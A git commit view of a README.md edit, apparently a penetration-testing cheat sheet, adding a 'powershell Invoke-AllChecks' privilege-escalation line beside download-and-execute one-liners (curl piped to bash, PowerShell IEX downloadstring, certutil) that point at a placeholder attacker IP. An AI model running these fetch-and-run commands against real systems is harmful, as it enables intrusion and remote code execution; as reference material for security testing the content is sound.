Update README.md

This commit is contained in:
Joe Totes
2022-09-01 13:19:20 -04:00
committed by GitHub
parent 1dfe66e532
commit 18be7a56b9

View File

@@ -754,6 +754,7 @@ curl {IP ADDRESS}/{FILE.sh} | bash
# Windows - Download file and execute in powershell: # Windows - Download file and execute in powershell:
powershell -c 'IEX(New-Object Net.WebClient).downloadstring("http://{IP ADDRESS}/{FILE}")' powershell -c 'IEX(New-Object Net.WebClient).downloadstring("http://{IP ADDRESS}/{FILE}")'
powershell -c 'Invoke-AllChecks'
# Windows - Download file using certutil # Windows - Download file using certutil
certutil -split -f -urlcache http://{IP ADDRESS}/{FILE} certutil -split -f -urlcache http://{IP ADDRESS}/{FILE}